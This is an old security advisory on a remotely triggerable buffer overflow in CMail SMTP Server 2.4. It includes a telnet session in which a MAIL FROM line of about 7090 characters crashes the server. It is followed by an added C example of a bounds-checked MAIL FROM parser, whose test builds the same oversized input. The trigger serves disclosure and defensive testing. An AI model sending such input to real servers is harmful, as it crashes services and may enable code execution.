cmail-2.4.txt

1999-11-02T00:00:00
ID PACKETSTORM:11590
Type packetstorm
Reporter Underground Security Systems Research
Modified 1999-11-02T00:00:00

Description

`CMail SMTP Server Version 2.4: Remotely exploitable buffer overflow
  
CMail SMTP Server Version 2.4

Problem: We found a buffer overflow in the CMail SMTP service (long MAIL FROM:)
that may allow an attacker to execute arbitrary code on the target server.
It is based on the overflows eEye pointed out in CMail 2.3 >:-] which were
never fixed... software vendors are still not taking security issues seriously.
  
Example:   
  
[cham@guilt cham]$ telnet example.com 25
Trying example.com...
Connected to example.com.
Escape character is '^]'.
220 SMTP services ready. Computalynx CMail Server Version: 2.4  
helo ussr  
250 Hello ussr [yourip], how are you today?   
MAIL FROM: cmail<[buffer]@cmaildotcom.com>   
Where [buffer] is approx. 7090 characters.
At this point the server overflows and crashes.
  
  
Just a typical buffer overflow that should  
have been fixed in version 2.3 when it was pointed out to them.  
  
Luck Martins   
  
u n d e r g r o u n d s e c u r i t y s y s t e m s r e s e a r c h   
  
WWW.USSRBACK.COM  
  
`
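
A bounds-checked MAIL FROM handler showing the length checks whose absence the advisory describes, as an added example (not CMail's code and not part of the advisory). The function name, buffer sizes and reply-code choices are assumptions; the limits are those of RFC 5321 section 4.5.3.1.

```c
#include <stdio.h>
#include <string.h>
#include <strings.h>

#define SMTP_LINE_MAX 512   /* RFC 5321 4.5.3.1.4: command line incl. CRLF */
#define SMTP_PATH_MAX 256   /* RFC 5321 4.5.3.1.3: path incl. the <> */

/* Hypothetical handler: copies the reverse-path of one MAIL FROM line
 * (len bytes, CRLF already stripped) into out. Returns the SMTP reply code. */
int parse_mail_from(const char *line, size_t len, char *out, size_t outsz)
{
    static const char verb[] = "MAIL FROM:";
    const size_t vlen = sizeof verb - 1;
    const char *lt, *gt;
    size_t plen;

    if (outsz == 0) return 451;
    out[0] = '\0';
    /* Reject on length before anything is scanned or copied. */
    if (len > SMTP_LINE_MAX - 2) return 500;          /* line too long */
    if (len < vlen || strncasecmp(line, verb, vlen) != 0) return 500;
    if (memchr(line, '\0', len) != NULL) return 501;  /* embedded NUL */

    /* Lenient like the advisory's sample: text before '<' is skipped. */
    lt = memchr(line + vlen, '<', len - vlen);
    if (lt == NULL) return 501;
    gt = memchr(lt, '>', len - (size_t)(lt - line));
    if (gt == NULL) return 501;

    plen = (size_t)(gt - lt) - 1;                     /* bytes between < and > */
    if (plen + 2 > SMTP_PATH_MAX) return 501;         /* path too long */
    if (plen + 1 > outsz) return 451;                 /* destination too small */
    memcpy(out, lt + 1, plen);
    out[plen] = '\0';
    return 250;
}

int main(void)
{
    char big[7200], path[SMTP_PATH_MAX];
    const char *ok = "MAIL FROM:<a@example.com>";
    /* Constructed input shaped like the advisory's example line. */
    size_t n = (size_t)sprintf(big, "MAIL FROM: cmail<");
    memset(big + n, 'A', 7090); n += 7090;
    n += (size_t)sprintf(big + n, "@cmaildotcom.com>");
    printf("oversized: %d\n", parse_mail_from(big, n, path, sizeof path));
    printf("normal:    %d\n", parse_mail_from(ok, strlen(ok), path, sizeof path));
    return 0;
}
```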